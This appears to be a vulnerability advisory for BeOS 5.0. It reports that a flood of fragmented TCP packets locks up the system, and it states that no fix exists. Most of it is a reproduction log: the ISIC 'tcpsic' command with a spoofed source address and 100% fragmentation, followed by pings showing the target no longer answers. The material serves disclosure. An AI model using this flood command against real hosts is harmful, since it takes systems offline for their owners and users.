COMMAND

    TCP/IP

SYSTEMS AFFECTED

    Be/OS 5.0

PROBLEM

    visi0n  found  following  (AUX  Security  Advisory).   The   Be/OS
    Operating  System  version  5.0  have  a  vulnerability in the tcp
    fragmentation which can lock up the entire system, needing a  cold
    reset to back work. The bug can be reproduced using the ISIC-0.05.

        [root@localhost isic-0.05]# ping 10.0.1.46
        PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data.
        64 bytes from 10.0.1.46: icmp_seq=0 ttl=255 time=7.3 ms
        64 bytes from 10.0.1.46: icmp_seq=1 ttl=255 time=1.8 ms
        
        --- 10.0.1.46 ping statistics ---
        2 packets transmitted, 2 packets received, 0% packet loss
        round-trip min/avg/max = 1.8/4.5/7.3 ms
        [root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0
        -I0 -T0 -u0 -t0
        Compiled against Libnet 1.0.1b
        Installing Signal Handlers.
        Seeding with 31337
        No Maximum traffic limiter
        Using random source ports.
        Using random destination ports.
        Bad IP Version  = 0%            IP Opts Pcnt    = 0%
        Frag'd Pcnt     = 100%          Urg Pcnt        = 0%
        Bad TCP Cksm    = 0%            TCP Opts Pcnt   = 0%
        
         1000 @ 1802.8 pkts/sec and 1174.6 k/s
         2000 @ 1636.8 pkts/sec and 1105.5 k/s
         3000 @ 2110.2 pkts/sec and 1396.4 k/s
         4000 @ 1689.1 pkts/sec and 1105.4 k/s
        Caught signal 2
        Used random seed 31337
        Wrote 5002 packets in 2.74s @ 1824.48 pkts/s
        [root@localhost isic-0.05]# ping 10.0.1.46
        PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data.
        
        --- 10.0.1.46 ping statistics ---
        11 packets transmitted, 0 packets received, 100% packet loss
        [root@localhost isic-0.05]#

SOLUTION

    No fix yet.